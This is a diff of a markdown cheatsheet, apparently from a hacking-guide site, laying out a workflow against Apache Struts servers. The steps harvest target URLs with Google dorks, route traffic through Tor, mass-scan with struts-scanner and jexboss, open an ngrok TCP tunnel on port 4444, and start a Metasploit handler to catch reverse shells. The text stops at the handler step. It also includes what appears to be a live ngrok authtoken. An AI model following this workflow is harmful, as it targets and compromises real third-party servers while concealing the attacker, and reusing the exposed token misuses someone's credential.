alfazzafashion/ghpages-utility/collections/_cheatsheet/APACHESTRUTS.md

 ~~~

 ## Optional
-Save your dorks list into a file such as "dorks.txt"
-Specify the output path and filename such as "urls.txt"
+Save your dorks list into a file such as "dorks.txt" and Specify the output path and filename such as "urls.txt"
 ~~~bash
 $ sudo python pagodo.py ­-g dorks.txt ­-l 200 ­-s ­-e 35.0 ­-j 1.1 >> urls.txt
 ~~~

-## INITIALIZE TOR SESSION
+## INITIALIZE TOR SESSION WITH TORPHANTOM
-Start Torphantom

 ###  Type the below commands
 ~~~bash
 $ sudo torphantom start ­-i <interface>
 ~~~

-Scan using Struts-Scanner
+### Scan using Struts-Scanner

-### Type the below commands and follow up the screen prompt
+Type the below commands and follow up the screen prompt
 ~~~bash
 $ ./struts­-scanner
 ~~~

-Scan using Jexboss

-### Type the below commands after correcting the input and output file paths
+Type the below commands after correcting the input and output file paths
 ~~~bash
 $ python jexboss.py ­-mode -file­-scan -­file /path/file/urls.txt ­-out /path/output/results.log ­­--struts2
 ~~~

-## INITIALIZE TCP TUNNELING
+## INITIALIZE TCP TUNNELING WITH NGROK

-Start Ngrok

-###  Your Token can be found in your Ngrok account

 ~~~bash
 $ ./ngrok authtoken 8ml78jQFrVNah4cN8UwTt_5ZVZYRPD8q7huTk7vo8MZ
 ~~~

-Create the Session
+*Your Token can be found in your Ngrok account*

-### Create the Ngrok session on the port 4444 using the below command
+Create the Ngrok session on the port 4444 using the below command
 ~~~bash
 $ ./ngrok tcp 4444
 ~~~

 ## CREATE MSF HANDLER

-Start Metasploit

-### Open Metasploit
 ~~~bash
 $ msfconsole
 $ msf > use exploit/multi/handler